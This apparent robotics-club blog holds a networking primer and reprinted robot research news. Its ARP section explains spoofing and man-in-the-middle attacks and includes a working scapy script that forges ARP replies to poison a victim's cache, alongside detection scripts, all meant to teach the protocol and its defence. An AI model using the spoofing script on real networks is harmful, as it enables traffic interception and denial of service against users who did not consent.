Sunday, 27 December 2009

1. Address Resolution Protocol (ARP)

The Address Resolution Protocol (ARP) is a protocol in the TCP/IP protocol suite responsible for resolving IP addresses into Media Access Control (MAC) addresses. ARP is defined in RFC 826.
When an application that supports the TCP/IP networking stack tries to reach a TCP/IP host by its IP address, that IP address must first be translated into a MAC address so that data frames can be forwarded to their destination and placed onto the transmission medium (copper, radio, or light) after being processed by the Network Interface Card (NIC). This is because the NIC operates at the physical and data-link layers of the seven-layer OSI reference model and uses physical addresses rather than logical addresses (such as IP addresses or NetBIOS names) to communicate on the network.


If the destination address lies outside the local network, ARP will instead try to obtain the MAC address of the local router interface that connects the local network to the outside network where the destination computer resides. [1]

IP and MAC (Media Access Control) addresses are the elements ARP works with for addressing in a computer network. When a computer joins a network, it announces its presence to all computers on the network (a broadcast) using its IP address and its MAC address, often referred to as its hardware address.

Address Resolution Protocol

Information about MAC addresses is stored in RAM (Random Access Memory) and is temporary, with a lifetime of only about two minutes, although entries can be refreshed. This storage area in RAM is called the ARP (Address Resolution Protocol) cache. ARP always checks the ARP cache first; if it finds the IP address but no MAC address paired with it, it sends a request onto the network.
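To make the cache concrete, here is a minimal sketch (not part of the original article) that lists the local ARP cache by parsing the output of the standard arp -a command available on Windows, Linux, and macOS. The exact output format varies per system, so the regular expression is a best-effort assumption:

    # List (IP, MAC) pairs from the local ARP cache via `arp -a`.
    import re
    import subprocess

    # An IPv4 address, followed later on the same line by a MAC address
    # written as six hex pairs separated by ':' (Unix) or '-' (Windows).
    ARP_LINE = re.compile(
        r"(\d{1,3}(?:\.\d{1,3}){3}).*?"
        r"([0-9a-fA-F]{2}(?:[:-][0-9a-fA-F]{2}){5})"
    )

    def read_arp_cache():
        """Return a list of (ip, mac) pairs found in the ARP cache."""
        output = subprocess.run(["arp", "-a"],
                                capture_output=True, text=True).stdout
        return [m.groups()
                for m in map(ARP_LINE.search, output.splitlines()) if m]

    for ip, mac in read_arp_cache():
        print(f"{ip:15} -> {mac}")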

The principle behind ARP is that no more than one IP address may be paired with the same MAC address at a time. Consequently, you cannot use an IP address that another computer is already using, and you cannot use a MAC address that has already been paired with another IP.

The ARP protocol is stateless: it sends MAC address requests, and it broadcasts notifications to the computers on the network when an addressing inconsistency occurs, even when no computer asked for them. ARP is also non-routable: it only works within a single local network segment.

ARP Spoofing

Security threats arise when the IP-to-MAC mapping is deliberately manipulated. This process, commonly called ARP spoofing or ARP poisoning, begins by looking for computers connected by an open (mutually trusting) connection. Suppose computer B, with hardware address BB:BB, trusts computer C, with hardware address CC:CC. The attacker sits at computer A with MAC address AA:AA. The attacker will then try to send a notification to computer B claiming that computer C's MAC address is AA:AA.
One example of an application that can be used to manipulate MAC addresses is WinArpSpoof. Before installing it, we first have to install the WinPcap package, which captures packet data on the network.
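For illustration, the forged "is-at" reply described above can be reproduced with the scapy packet library (an assumption on my part; the article itself only names WinArpSpoof). The IP addresses below are hypothetical stand-ins for B and C, the MACs are the article's shorthand values padded to full length, and this sketch should only ever be run in an isolated lab network you own:

    # A minimal ARP-spoofing sketch with scapy (pip install scapy).
    # Requires root/administrator privileges; lab use only.
    from scapy.all import ARP, Ether, sendp

    VICTIM_B_IP, VICTIM_B_MAC = "192.168.0.2", "bb:bb:bb:bb:bb:bb"
    SPOOFED_C_IP = "192.168.0.3"          # C, the host being impersonated
    ATTACKER_A_MAC = "aa:aa:aa:aa:aa:aa"  # A, the attacker

    # Forged ARP reply to B: "C's IP is at A's MAC address."
    forged = Ether(dst=VICTIM_B_MAC) / ARP(
        op=2,                  # opcode 2 = ARP reply ("is-at")
        psrc=SPOOFED_C_IP,     # claim to speak for C's IP ...
        hwsrc=ATTACKER_A_MAC,  # ... but give the attacker's MAC
        pdst=VICTIM_B_IP,
        hwdst=VICTIM_B_MAC,
    )
    sendp(forged)  # send at layer 2; B's ARP cache now maps C -> AA:AA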

Inconveniently for the attacker, the operating system keeps checking the ARP cache and will send an addressing request whenever something changes, or whenever it detects more than one IP address with the same MAC address in the ARP cache. To suppress this, a cracker will typically run a program that keeps answering that nothing in the ARP cache has changed.

With ARP spoofing, an attacker can steer traffic on the network. Data packets sent from target B to target C first detour through the attacker's machine (computer A). After reading the contents, the attacker can even send forged messages to computer C that appear to come from computer B. This class of attack is known as a "man-in-the-middle attack". A different outcome occurs if the attacker pairs the target computer with a MAC address unknown to the network: the target is no longer recognized by the network and its service requests are rejected, an attack known as "denial of service (DoS)".
To detect a spoofing attempt, we can check the contents of the address table using the Reverse ARP (RARP) protocol. If more than one IP address is using the same MAC address, something may be wrong. If nothing is wrong with the table, we can send an ICMP (Internet Control Message Protocol) packet, better known as a ping, to the computer. If an error (unreachable) message appears, we should become suspicious and investigate the system immediately.
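Here is a minimal sketch of the duplicate-address check described above, again assuming an arp -a command is available. It flags any MAC address paired with more than one IP in the cache; a hit is a prompt for investigation, not proof of spoofing, since a router may legitimately hold several addresses:

    # Flag MAC addresses that appear for more than one IP in the ARP cache.
    import re
    import subprocess
    from collections import defaultdict

    ARP_LINE = re.compile(
        r"(\d{1,3}(?:\.\d{1,3}){3}).*?"
        r"([0-9a-fA-F]{2}(?:[:-][0-9a-fA-F]{2}){5})"
    )

    def suspicious_macs():
        """Return {mac: [ips]} for every MAC bound to more than one IP."""
        output = subprocess.run(["arp", "-a"],
                                capture_output=True, text=True).stdout
        ips_by_mac = defaultdict(set)
        for line in output.splitlines():
            m = ARP_LINE.search(line)
            if m:
                ip, mac = m.group(1), m.group(2).lower().replace("-", ":")
                ips_by_mac[mac].add(ip)
        return {mac: sorted(ips)
                for mac, ips in ips_by_mac.items() if len(ips) > 1}

    for mac, ips in suspicious_macs().items():
        print(f"WARNING: {mac} is claimed by several IPs: {', '.join(ips)}")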
The ARP protocol can be manipulated for malicious ends, but it can also be put to good use, for example to check membership of an internet access facility. Many people now access the internet over Wi-Fi networks, which use radio waves; on such networks, ARP can be used to check the MAC addresses of the computers connected to the internet. (PCplus, 292) [2]
2. Internet Control Message Protocol (ICMP)
The Internet Control Message Protocol (ICMP) is one of the core protocols of the internet protocol family. ICMP is mainly used by the operating systems of networked computers to send error messages stating, for example, that a destination computer cannot be reached.
ICMP differs in purpose from TCP and UDP in that it is not used directly by users' network applications. One exception is the ping application, which sends ICMP Echo Request messages (and receives Echo Replies) to determine whether a destination computer is reachable and how long its replies take. [3]
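As a minimal sketch of such a reachability test (assuming the system ping command; its count flag is -n on Windows and -c elsewhere), the following sends one ICMP Echo Request and reports whether a reply came back:

    # Send one ICMP Echo Request via the system `ping` command.
    import platform
    import subprocess

    def is_reachable(host: str, timeout_s: int = 5) -> bool:
        count_flag = "-n" if platform.system() == "Windows" else "-c"
        try:
            result = subprocess.run(["ping", count_flag, "1", host],
                                    capture_output=True, timeout=timeout_s)
        except subprocess.TimeoutExpired:
            return False
        return result.returncode == 0  # 0 means at least one reply arrived

    print(is_reachable("192.168.1.1"))  # hypothetical gateway address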
3. Hub vs switch


Figure: A hub simply repeats all traffic to every port, while a switch makes a temporary connection between the ports that need to communicate.
A hub is considered a simple device because it inefficiently broadcasts all traffic to every port. This simplicity carries penalties in both performance and security. Overall performance is slower because the available bandwidth must be shared among all ports, and since all traffic is visible on every port, any host on the network can easily monitor the entire network's traffic.
A switch creates a virtual connection between the receiving and sending ports. This yields better performance because many virtual connections can be established simultaneously. More expensive switches can switch traffic by inspecting packets at higher levels (the transport or application layer), allowing the creation of VLANs and the implementation of other advanced features.
A hub can still be used when traffic genuinely needs to be repeated to every port; for example, when you want one machine to monitor all traffic on the network. Most switches provide a port-monitoring function that repeats traffic from selected ports to a specific port assigned for this purpose.
Hubs are cheaper than switches. However, switch prices have dropped drastically in recent years, so networks still running old hubs should be upgraded to new switches where possible.
Hubs and switches may offer managed services. These can include the ability to set the link speed per port (10baseT, 100baseT, 1000baseT, full duplex or half duplex), notifications of network events (such as MAC address changes or malformed packets), and usually per-port traffic counters for easier bandwidth accounting. A managed switch that reports upload and download byte counts for every physical port can greatly simplify network monitoring. These services are typically available via SNMP, or can be accessed through telnet, ssh, a web interface, or a dedicated configuration tool. [4]
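As an illustration of reading those per-port counters, here is a minimal sketch using the pysnmp library's classic hlapi interface (an assumption on my part; any SNMP client would do) to fetch IF-MIB's ifInOctets and ifOutOctets for one port. The switch address, community string, and interface index are hypothetical:

    # Read per-port byte counters from a managed switch over SNMP v2c.
    # Requires: pip install pysnmp
    from pysnmp.hlapi import (
        CommunityData, ContextData, ObjectIdentity, ObjectType,
        SnmpEngine, UdpTransportTarget, getCmd,
    )

    def port_octets(switch_ip, community, if_index):
        """Return (bytes_in, bytes_out) for one interface index."""
        error_indication, error_status, _, var_binds = next(getCmd(
            SnmpEngine(),
            CommunityData(community),             # SNMP v2c community string
            UdpTransportTarget((switch_ip, 161)),
            ContextData(),
            ObjectType(ObjectIdentity("IF-MIB", "ifInOctets", if_index)),
            ObjectType(ObjectIdentity("IF-MIB", "ifOutOctets", if_index)),
        ))
        if error_indication or error_status:
            raise RuntimeError(str(error_indication or error_status))
        return tuple(int(value) for _, value in var_binds)

    bytes_in, bytes_out = port_octets("192.168.0.254", "public", 1)
    print(f"port 1: {bytes_in} bytes in, {bytes_out} bytes out")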

References:
[1] http://id.wikipedia.org/wiki/Address_Resolution_Protocol
[2] http://www.bestlib.co.cc/2009/07/mengenal-address-resolution-protocol.html
[3] http://id.wikipedia.org/wiki/Internet_Control_Message_Protocol
[4] http://opensource.telkomspeedy.com/wiki/index.php/WNDW:_Hub_vs._Switch

Thursday, 24 December 2009

[ Sunday, 20 December 2009 ]
From the Jawa Timur Robot Contest 2009 at PENS-ITS
Choosing Analog Robots Because They Are Easy to Build

Various kinds of robots were pitted against one another yesterday (19/12) at the Politeknik Elektronika Negeri Surabaya-Institut Teknologi Sepuluh Nopember (PENS-ITS). They were built not only by university students, but also by senior high school --and even elementary school-- students from various schools across East Java.

---

DOZENS of line tracer (line-following) robots took part in the Jawa Timur Robot Contest 2009 at PENS-ITS yesterday (19/12). The robots were built by students ranging from elementary school to university level from various parts of East Java, with some entrants also coming from Jogjakarta and Solo. Yesterday was the preliminary round; the final round takes place today.

The event, organized by the PENS-ITS Student Association, drew 205 teams: 140 school teams, 22 teams of PENS students from the class of 2009, and 43 teams of university students at large. "We want to introduce robotics from an early age," said Satriyo Utomo, chair of the Jawa Timur Robot Contest 2009 organizing committee, yesterday.

The robots raced each other around a predetermined circuit. The line tracers competing this time came in two classes: analog and micro. "Most of the school students competed with analog line tracers," Satriyo said.

Besides being easier to build, the analog class involves no complicated programming. "You just buy the parts and sensors," he added. For the micro line tracer class, the programming is done directly on a computer, so control rests with the computer operated by a team member.

Baskhoro Satriyo, a contestant from SMPN 6 Surabaya, was among those who chose an analog robot. "This robot is easy to build and operate," he said, explaining that the line tracer was built by students who take part in the school's robotics extracurricular club.

Fahruzul Fahmi, a contestant from SD Islam Raudhatul Jannah, said the same. "I only joined the robotics club this year," he said. According to him, the school supports his interest in robotics by bringing in a trainer to teach the students about robots. Every week they are given dedicated time to study and learn more about robotics.

Siti Aisyah, a teacher at SD Islam Raudlatul Jannah, said the school deliberately develops robotics by inviting a dedicated trainer from among ITS students. "Many of the children are interested," she said.

In fact, the robotics club has become one of her students' favorite activities. The school sent two teams, Suroboter and Junior Roboter. "Robotics is good for children," she said; children's desire to play can be channeled into learning about robots. (upik dyah eka noviyanti/tom)

Friday, 23 October 2009

Robotic NEWS !!


Scientists Create Robot Surrogate For Blind Persons In Testing Visual Prostheses

(Oct. 20, 2009) — Scientists at the California Institute of Technology (Caltech) have created a remote-controlled robot that is able to simulate the "visual" experience of a blind person who has been implanted with a visual prosthesis, such as an artificial retina. An artificial retina consists of a silicon chip studded with a varying number of electrodes that directly stimulate retinal nerve cells. It is hoped that this approach may one day give blind persons the freedom of independent mobility.


The CYCLOPS mobile robotic platform is designed to be used as a surrogate for blind persons in the testing of visual prostheses. (Credit: Caltech/Wolfgang Fink, Mark Tarbell)

The robot—or, rather, the mobile robotic platform, or rover—is called CYCLOPS. It is the first such device to emulate what the blind can see with an implant, says Wolfgang Fink, a visiting associate in physics at Caltech and the Edward and Maria Keonjian Distinguished Professor in Microelectronics at the University of Arizona. Its development and potential uses are described in a paper recently published online in the journal Computer Methods and Programs in Biomedicine.

An artificial retina, also known as a retinal prosthesis, may use either an internal or external miniature camera to capture images. The captured images then are processed and passed along to the implanted silicon chip's electrode array. (Ongoing work at Caltech's Visual and Autonomous Exploration Systems Research Laboratory by Fink and Caltech visiting scientist Mark Tarbell has focused on the creation and refinement of these image-processing algorithms.) The chip directly stimulates the eye's functional retinal ganglion cells, which carry the image information to the vision centers in the brain.

CYCLOPS fills a void in the process of testing visual prostheses, explains Fink. "How do you approximate what the blind can see with the implant so you can figure out how to make it better?" he asks.

One way is to test potential enhancements on a blind person who has been given an artificial retina. And, indeed, the retinal implant research team does this often, and extensively. But few people worldwide have been implanted with retinal prostheses, and there is only so much testing they can be asked to endure.

Another way is to give sighted people devices that downgrade their vision to what might be expected using artificial vision prostheses. And this, too, is often done. But it's a less-than-ideal solution since the brain of a sighted person is adept at taking poor-quality images and processing them in various ways, adding detail as needed. This processing is what allows most people to see in dim light, for example, or through smoke or fog.

"A sighted person's objectivity is impaired," Fink says. "They may not be able to get to the level of what a blind person truly experiences."

Enter one more possible solution: CYCLOPS. "We can use CYCLOPS in lieu of a blind person," Fink explains. "We can equip it with a camera just like what a blind person would have with a retinal prosthesis, and that puts us in the unique position of being able to dictate what the robot receives as visual input."

Now, if scientists want to see how much better the resolution is when a retinal prosthesis has an array of 50 pixels as opposed to 16 pixels, they can try both out on CYCLOPS. They might do this by asking the robot to follow a black line down a white-tiled hallway, or seeing if it can find—and enter—a darkened doorway.

"We're not quite at that stage yet," Fink cautions, referring to such independent maneuvering.

CYCLOPS's camera is gimballed, which means it can emulate left-to-right and up-and-down head movements. The input from the camera runs through the onboard computing platform, which does real-time image processing. For now, however, the platform itself is moved around remotely, via a joystick. "The platform can be operated from anywhere in the world, through its wireless Internet connection," says Tarbell.

"We have the image-processing algorithms running locally on the robot's platform—but we have to get it to the point where it has complete control of its own responses," Fink says.

Once that's done, he adds, "we can run many, many tests without bothering the blind prosthesis carriers."

Among the things they hope to learn from such testing is how to enhance a workplace or living environment to make it more accessible to a blind person with a particular vision implant. If CYCLOPS can use computer-enhanced images from a 50-pixel array to make its way safely through a room with a chair in one corner, a sofa along the wall, and a coffee table in the middle, then there is a good chance that a blind person with a 50-pixel retinal prosthesis would be able to do the same.

The results of tests on the CYCLOPS robot should also help researchers determine whether a particular version of a prosthesis, say, or its onboard image-processing software, are even worth testing in blind persons. "We'll be coming in with a much more educated initial starting point, after which we'll be able to see how blind people work with these implants," Fink notes.

And the implants need to work well. After all, Fink points out, "Blind people using a cane or a canine unit can move around impressively well. For an implant to be useful, it has to have the implicit promise that it will surpass these tools. The ultimate promise—the hope—is that we instill in them such useful vision that they can attain independent mobility, can recognize people, and can go about their daily lives."

The work done in the paper by Fink and Tarbell, "CYCLOPS: A mobile robotic platform for testing and validating image processing and autonomous navigation algorithms in support of artificial vision prostheses," was supported by a grant from the National Science Foundation. Fink and Tarbell have filed a provisional patent on the technology on behalf of Caltech.


Adapted from materials provided by California Institute of Technology, via EurekAlert!, a service of AAAS.

Swimming Robot Makes Waves At Bath

(Sep. 25, 2009) — Researchers at the University of Bath have used nature for inspiration in designing a new type of swimming robot which could bring a breakthrough in submersible technology.


Postgraduate researchers Keri Collins and Ryan Ladd developed the Gymnobot. It is powered by a fin that runs the length of the underside of its rigid body; this undulates to make a wave in the water which propels the robot forwards. (Credit: Image courtesy of University of Bath)

Conventional submarine robots are powered by propellers that are heavy, inefficient and can get tangled in weeds.

In contrast, ‘Gymnobot’, created by researchers from the Ocean Technologies Lab in the University's Department of Mechanical Engineering, is powered by a fin that runs the length of the underside of its rigid body; this undulates to make a wave in the water which propels the robot forwards.

The design, inspired by the Amazonian knifefish, is thought to be more energy efficient than conventional propellers and allows the robot to navigate shallow water near the sea shore.

Gymnobot could be used to film and study the diverse marine life near the seashore, where conventional submersible robots would have difficulty manoeuvring due to the shallow water with its complex rocky environment and plants that can tangle a propeller.

Dr William Megill, Lecturer in Biomimetics at the University of Bath, explained: "The knifefish has a ventral fin that runs the length of its body and makes a wave in the water that enables it to easily swim backwards or forwards in the water.

"Gymnobot mimics this fin and creates a wave in the water that drives it forwards. This form of propulsion is potentially much more efficient than a conventional propeller and is easier to control in shallow water near the shore."

Keri Collins, a postgraduate student who developed the Gymnobot as part of her PhD, added: "We hope to observe how the water flows around the fin in later stages of the project. In particular we want to look at the creation and development of vortices around the fin.

"Some fish create vortices when flicking their tails one way but then destroy them when their tails flick back the other way. By destroying the vortex they are effectively re-using the energy in that swirling bit of water. The less energy left in the wake when the fish has passed, the less energy is wasted.

"It will be particularly interesting to see how thrust is affected by changing the wave of the fin from a constant amplitude to one that is tapered at one end."

The lab was recently awarded a grant to work with six other European institutions to create a similar robot that reacts to water flow and is able to swim against currents.

In addition to studying biodiversity near the shore and in fast-flowing rivers, robots like Gymnobot could also be used for detecting pollution in the environment or for inspecting structures such as oil rigs.

The project was funded by BMT Defence Services and the Engineering & Physical Sciences Research Council.


Adapted from materials provided by University of Bath, via AlphaGalileo.

Research Teams Successfully Operate Multiple Biomedical Robots From Numerous Locations

ScienceDaily (Sep. 18, 2009) — Using a new software protocol called the Interoperable Telesurgical Protocol, nine research teams from universities and research institutes around the world recently collaborated on the first successful demonstration of multiple biomedical robots operated from different locations in the U.S., Europe, and Asia. SRI International operated its M7 surgical robot for this demonstration.


SRI M7 system. (Credit: Image courtesy of SRI International)

In a 24-hour period, each participating group connected over the Internet and controlled robots at different locations. The tests performed demonstrated how a wide variety of robot and controller designs can seamlessly interoperate, allowing researchers to work together easily and more efficiently. In addition, the demonstration evaluated the feasibility of robotic manipulation from multiple sites, and was conducted to measure time and performance for evaluating laparoscopic surgical skills.

New Interoperable Telesurgical Protocol

The new protocol was cooperatively developed by the University of Washington and SRI International to standardize the way remotely operated robots are managed over the Internet.

"Although many telemanipulation systems have common features, there is currently no accepted protocol for connecting these systems," said SRI's Tom Low. "We hope this new protocol serves as a starting point for the discussion and development of a robust and practical Internet-type standard that supports the interoperability of future robotic systems."

The protocol will allow engineers and designers who usually develop technologies independently to work collaboratively, determine which designs work best, encourage widespread adoption of the new communications protocol, and help robotics research evolve more rapidly. Early adoption of this protocol internationally will encourage robotic systems to be developed with interoperability in mind, and avoid future incompatibilities.

"We're very pleased with the success of the event in which almost all of the possible connections between operator stations and remote robots were successful. We were particularly excited that novel elements such as a simulated robot and an exoskeleton controller worked smoothly with the other remote manipulation systems," said Professor Blake Hannaford of the University of Washington.

The demonstration included the following organizations:

  • SRI International, Menlo Park, Calif., USA
  • University of Washington Biorobotics Lab (BRL), Seattle, Washington, USA
  • University of California at Santa Cruz (UCSC), Bionics Lab, Santa Cruz, Calif., USA
  • iMedSim, Interactive Medical Simulation Laboratory, Rensselaer Polytechnic Institute, Troy, New York, USA
  • Korea University of Technology (KUT) BioRobotics Lab, Cheonan, South Chungcheong, South Korea
  • Imperial College London (ICL), London, England
  • Johns Hopkins University (JHU), Baltimore, Maryland, USA
  • Technische Universität München (TUM), Munich, Germany
  • Tokyo Institute of Technology (TOK), Tokyo, Japan

For more information regarding availability of the Interoperable Telesurgical Protocol, please visit: http://brl.ee.washington.edu/Research_Active/Interoperability/index.php/Main_Page


Adapted from materials provided by SRI International.




Saturday, 10 October 2009





We're the champion!!!!
Winners of 1st place in the sumo robot contest at STIKOM and 3rd place in line tracer!
Thank you, friends, for all your prayers and support...
None of this came from our hard work alone...
but from God, who gave us all the best path... and the most beautiful plan for us all...
be humble... humble... and humble...
amen...

Photo: the winners of 1st place, sumo robot, and 3rd place, line tracer robot


Thursday, 3 September 2009

For the purposes of learning the micro robot, a C/C++ programming tutorial can be
downloaded here >>> [ Download ]


Thank you for the support and cooperation of all you roboholics, and of everyone who has helped this community grow, especially mas Burhan and mas Andhik !!! :D

find the future here


Saturday, 13 June 2009

Welcome to 20 Roboholic Community





Roboholic news!!!

Members of the 20 Roboholic team can use indo-code.com to learn the basics of the C/C++ programming language.


Human-like Vision Lets Robots Navigate Naturally

ScienceDaily (July 17, 2009) — A robotic vision system that mimics key visual functions of the human brain promises to let robots manoeuvre quickly and safely through cluttered environments, and to help guide the visually impaired.


An inside view of VisGuide with the electronic circuits on the main board. The video signals are sent via cables to a lightweight micro-PC that is carried by the user. (Credit: Decisions in Motion Project (www.decisionsinmotion.org))

It’s something any toddler can do – cross a cluttered room to find a toy.

It's also one of those seemingly trivial skills that have proved to be extremely hard for computers to master. Analysing shifting and often-ambiguous visual data to detect objects and separate their movement from one’s own has turned out to be an intensely challenging artificial intelligence problem.

Three years ago, researchers at the European-funded research consortium Decisions in Motion (http://www.decisionsinmotion.org/) decided to look to nature for insights into this challenge.

In a rare collaboration, neuro- and cognitive scientists studied how the visual systems of advanced mammals, primates and people work, while computer scientists and roboticists incorporated their findings into neural networks and mobile robots.

The approach paid off. Decisions in Motion has already built and demonstrated a robot that can zip across a crowded room guided only by what it “sees” through its twin video cameras, and is hard at work on a head-mounted system to help visually impaired people get around.

“Until now, the algorithms that have been used are quite slow and their decisions are not reliable enough to be useful,” says project coordinator Mark Greenlee. “Our approach allowed us to build algorithms that can do this on the fly, that can make all these decisions within a few milliseconds using conventional hardware.”

How do we see movement?

The Decisions in Motion researchers used a wide variety of techniques to learn more about how the brain processes visual information, especially information about movement.

These included recording individual neurons and groups of neurons firing in response to movement signals, functional magnetic resonance imaging to track the moment-by-moment interactions between different brain areas as people performed visual tasks, and neuropsychological studies of people with visual processing problems.

The researchers hoped to learn more about how the visual system scans the environment, detects objects, discerns movement, distinguishes between the independent movement of objects and the organism’s own movements, and plans and controls motion towards a goal.

One of their most interesting discoveries was that the primate brain does not just detect and track a moving object; it actually predicts where the object will go.

“When an object moves through a scene, you get a wave of activity as the brain anticipates its trajectory,” says Greenlee. “It’s like feedback signals flowing from the higher areas in the visual cortex back to neurons in the primary visual cortex to give them a sense of what’s coming.”

Greenlee compares what an individual visual neuron sees to looking at the world through a peephole. Researchers have known for a long time that high-level processing is needed to build a coherent picture out of a myriad of those tiny glimpses. What's new is the importance of strong anticipatory feedback for perceiving and processing motion.

“This proved to be quite critical for the Decisions in Motion project,” Greenlee says. “It solves what is called the ‘aperture problem’, the problem of the neurons in the primary visual cortex looking through those little peepholes.”

Building a better robotic brain

Armed with a better understanding of how the human brain deals with movement, the project’s computer scientists and roboticists went to work. Using off-the-shelf hardware, they built a neural network with three levels mimicking the brain’s primary, mid-level, and higher-level visual subsystems.

They used what they had learned about the flow of information between brain regions to control the flow of information within the robotic “brain”.

“It’s basically a neural network with certain biological characteristics,” says Greenlee. “The connectivity is dictated by the numbers we have from our physiological studies.”

The computerised brain controls the behaviour of a wheeled robotic platform supporting a moveable head and eyes, in real time. It directs the head and eyes where to look, tracks its own movement, identifies objects, determines if they are moving independently, and directs the platform to speed up, slow down and turn left or right.

Greenlee and his colleagues were intrigued when the robot found its way to its first target – a teddy bear – just like a person would, speeding by objects that were at a safe distance, but passing nearby obstacles at a slower pace.

“That was very exciting,” Greenlee says. “We didn’t program it in – it popped out of the algorithm.”

In addition to improved guidance systems for robots, the consortium envisions a lightweight system that could be worn like eyeglasses by visually or cognitively impaired people to boost their mobility. One of the consortium partners, Cambridge Research Systems, is developing a commercial version of this, called VisGuide.

Decisions in Motion received funding from the ICT strand of the EU’s Sixth Framework Programme for research. The project’s work was featured in a video by the New Scientist in February this year.

Robo-bats With Metal Muscles May Be Next Generation Of Remote Control Flyers

ScienceDaily (July 8, 2009) — Tiny flying machines can be used for everything from indoor surveillance to exploring collapsed buildings, but simply making smaller versions of planes and helicopters doesn't work very well. Instead, researchers at North Carolina State University are mimicking nature's small flyers – and developing robotic bats that offer increased maneuverability and performance.


Small flyers, or micro-aerial vehicles (MAVs), have garnered a great deal of interest due to their potential applications where maneuverability in tight spaces is necessary, says researcher Gheorghe Bunget. For example, Bunget says, "due to the availability of small sensors, MAVs can be used for detection missions of biological, chemical and nuclear agents." But, due to their size, devices using a traditional fixed-wing or rotary-wing design have low maneuverability and aerodynamic efficiency.

So Bunget, a doctoral student in mechanical engineering at NC State, and his advisor Dr. Stefan Seelecke looked to nature. "We are trying to mimic nature as closely as possible," Seelecke says, "because it is very efficient. And, at the MAV scale, nature tells us that flapping flight – like that of the bat – is the most effective."

The researchers did extensive analysis of bats' skeletal and muscular systems before developing a "robo-bat" skeleton using rapid prototyping technologies. The fully assembled skeleton rests easily in the palm of your hand and, at less than 6 grams, feels as light as a feather. The researchers are currently completing fabrication and assembly of the joints, muscular system and wing membrane for the robo-bat, which should allow it to fly with the same efficient flapping motion used by real bats.

"The key concept here is the use of smart materials," Seelecke says. "We are using a shape-memory metal alloy that is super-elastic for the joints. The material provides a full range of motion, but will always return to its original position – a function performed by many tiny bones, cartilage and tendons in real bats."

Seelecke explains that the research team is also using smart materials for the muscular system. "We're using an alloy that responds to the heat from an electric current. That heat actuates micro-scale wires the size of a human hair, making them contract like 'metal muscles.' During the contraction, the powerful muscle wires also change their electric resistance, which can be easily measured, thus providing simultaneous action and sensory input. This dual functionality will help cut down on the robo-bat's weight, and allow the robot to respond quickly to changing conditions – such as a gust of wind – as perfectly as a real bat."

In addition to creating a surveillance tool with very real practical applications, Seelecke says the robo-bat could also help expand our understanding of aerodynamics. "It will allow us to do tests where we can control all of the variables – and finally give us the opportunity to fully understand the aerodynamics of flapping flight," Seelecke says.

Bunget will present the research this September at the American Society of Mechanical Engineers Conference on Smart Materials, Adaptive Structures and Intelligent Systems in Oxnard, Calif.

Researchers Unveil Whiskered Robot Rat

ScienceDaily (July 5, 2009) — A team of scientists have developed an innovative robot rat which can seek out and identify objects using its whiskers. The SCRATCHbot robot will be demonstrated this week (1 July 2009) at an international workshop looking at how robots can help us examine the workings of the brain.


Researchers from the Bristol Robotics Lab (a partnership between the University of the West of England and the University of Bristol) and the University of Sheffield have developed the SCRATCHbot, which is a significant milestone in the pan-European “ICEA” project to develop biologically-inspired artificial intelligence systems. As part of this project Professor Tony Prescott, from the University of Sheffield’s Department of Psychology, is working with the Bristol Robotics Lab to design innovative artificial touch technologies for robots that will also help us understand how the brain controls the movement of the sensory systems.

The new technology has been inspired by the use of touch in the animal kingdom. In nocturnal creatures, or those that inhabit poorly-lit places, this physical sense is widely preferred to vision as a primary means of discovering the world. Rats are especially effective at exploring their environments using their whiskers. They are able to accurately determine the position, shape and texture of objects using precise rhythmic sweeping movements of their whiskers, make rapid accurate decisions about objects, and then use the information to build environmental maps.

Robot designs often rely on vision to identify objects, but this new technology relies solely on sophisticated touch technology, enabling the robot to function in spaces such as dark or smoke-filled rooms, where vision cannot be used.

The new technology has the potential for a number of further applications from using robots underground, under the sea, or in extremely dusty conditions, where vision is often seriously compromised. The technology could also be used for tactile inspection of surfaces, such as materials in the textile industry, or closer to home in domestic products, for example vacuum cleaners that could sense textures for optimal cleaning.

Dr Tony Pipe (BRL, UWE) says: “For a long time, vision has been the biological sensory modality most studied by scientists. But active touch sensing is a key focus for those of us looking at biological systems which have implications for robotics research. Sensory systems such as rats’ whiskers have some particular advantages in this area. In humans, for example, where sensors are at the fingertips, they are more vulnerable to damage and injury than whiskers. Rats have the ability to operate with damaged whiskers and in theory broken whiskers on robots could be easily replaced, without affecting the whole robot and its expensive engineering.

“Future applications for this technology could include using robots underground, under the sea, or in extremely dusty conditions, where vision is often a seriously compromised sensory modality. Here, whisker technology could be used to sense objects and manoeuvre in a difficult environment. In a smoke filled room for example, a robot like this could help with a rescue operation by locating survivors of a fire. This research builds on previous work we have done on whisker sensing.”

Professor Prescott said: “Our project has reached a significant milestone in the development of actively-controlled, whisker-like sensors for intelligent machines. Although touch sensors are already employed in robots, the use of touch as a principal modality has been overlooked until now. By developing these biomimetic robots, we are not just designing novel touch-sensing devices, but also making a real contribution to understanding the biology of tactile sensing.”

Robot Learns To Smile And Frown

ScienceDaily (July 11, 2009) — A hyper-realistic Einstein robot at the University of California, San Diego has learned to smile and make facial expressions through a process of self-guided learning. The UC San Diego researchers used machine learning to “empower” their robot to learn to make realistic facial expressions.


“As far as we know, no other research group has used machine learning to teach a robot to make realistic facial expressions,” said Tingfan Wu, the computer science Ph.D. student from the UC San Diego Jacobs School of Engineering who presented this advance on June 6 at the IEEE International Conference on Development and Learning.

The faces of robots are increasingly realistic and the number of artificial muscles that control them is rising. In light of this trend, UC San Diego researchers from the Machine Perception Laboratory are studying the face and head of their robotic Einstein in order to find ways to automate the process of teaching robots to make lifelike facial expressions.

This Einstein robot head has about 30 facial muscles, each moved by a tiny servo motor connected to the muscle by a string. Today, a highly trained person must manually set up these kinds of realistic robots so that the servos pull in the right combinations to make specific face expressions. In order to begin to automate this process, the UCSD researchers looked to both developmental psychology and machine learning.

Developmental psychologists speculate that infants learn to control their bodies through systematic exploratory movements, including babbling to learn to speak. Initially, these movements appear to be executed in a random manner as infants learn to control their bodies and reach for objects.

“We applied this same idea to the problem of a robot learning to make realistic facial expressions,” said Javier Movellan, the senior author on the paper presented at ICDL 2009 and the director of UCSD’s Machine Perception Laboratory, housed in Calit2, the California Institute for Telecommunications and Information Technology.

Although their preliminary results are promising, the researchers note that some of the learned facial expressions are still awkward. One potential explanation is that their model may be too simple to describe the coupled interactions between facial muscles and skin.

To begin the learning process, the UC San Diego researchers directed the Einstein robot head (Hanson Robotics’ Einstein Head) to twist and turn its face in all directions, a process called “body babbling.” During this period the robot could see itself in a mirror and analyze its own expression using facial expression detection software created at UC San Diego called CERT (Computer Expression Recognition Toolbox). This provided the data necessary for machine learning algorithms to learn a mapping between facial expressions and the movements of the muscle motors.

